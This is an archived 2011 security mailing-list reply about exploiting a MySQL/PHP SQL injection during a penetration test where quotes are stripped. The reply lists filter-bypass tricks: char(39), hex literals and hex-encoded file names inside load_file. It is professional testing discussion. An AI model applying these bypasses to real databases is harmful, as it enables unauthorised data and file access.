WebApp Sec mailing list archives
Re: SQLi with backslash
From: Voulnet <voulnet () gmail com>
Date: Fri, 24 Jun 2011 20:17:33 +0300
They are probably using that mysql_real_escape_string php function,
which escapes these characters. There are many ways to bypass it, and
you can find it all over the web.
Some examples:
use char(39) <-- ASCII decimal value of ' is 39
or use the hex value. For example SELECT (0x27) <-- 27 is the hex value of '.
For example if you want to load a file, you would call
load_file('myfile'), using hex encoding you take 'myfile' with the
single quotes included and convert it to hex, then write it as
load_file(0x27..........27) with the rest of the hex values of the
filename characters filled in between.
On Wed, Jun 22, 2011 at 5:03 PM, Robin Wood <robin () digininja org> wrote:
Hi
I've got a scenario where both single and double quotes are being
stripped but no other escaping appears to be being performed. The
database is MySQL with php on top.
The query that I've found SQL injection on is in the form
insert into log values ('a', 'b');
where I can inject in to the second parameter.
If I inject a backslash then I get
insert into log values ('a', 'b\');
which gives an invalid SQL statement and is how the injection was
found. Can anyone come up with a way to exploit this? If I put
anything before the slash isn't really worth anything and if I put
anything after then the statement becomes valid and the slash escapes
whatever character is after it.
I thought about using the slash to encode something but couldn't get it to work.
The table is write only for me, I can't see any of its entries echo'ed
back to the site anywhere so I can't go for stored XSS or anything
like that (maybe possible but not in the time available for the test).
Apart from breaking the statement I can't see a way to exploit this,
can anyone else?
Robin
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------
This list is sponsored by Cenzic -------------------------------------- Let Us Hack You. Before Hackers Do! It's Finally Here - The Cenzic Website HealthCheck. FREE. Request Yours Now! http://www.cenzic.com/2009HClaunch_Securityfocus --------------------------------------
Current thread:
- SQLi with backslash Robin Wood (Jun 23)
- Re: SQLi with backslash Voulnet (Jun 26)
- Re: SQLi with backslash Robin Wood (Jun 27)
- Message not available
- RE: SQLi with backslash Onken, Skyler (Jun 28)
- Re: SQLi with backslash Robin Wood (Jun 27)
- Re: SQLi with backslash Voulnet (Jun 26)
- Message not available
- Re: SQLi with backslash Robin Wood (Jun 26)
- <Possible follow-ups>
- Re: SQLi with backslash Robin Wood (Jun 26)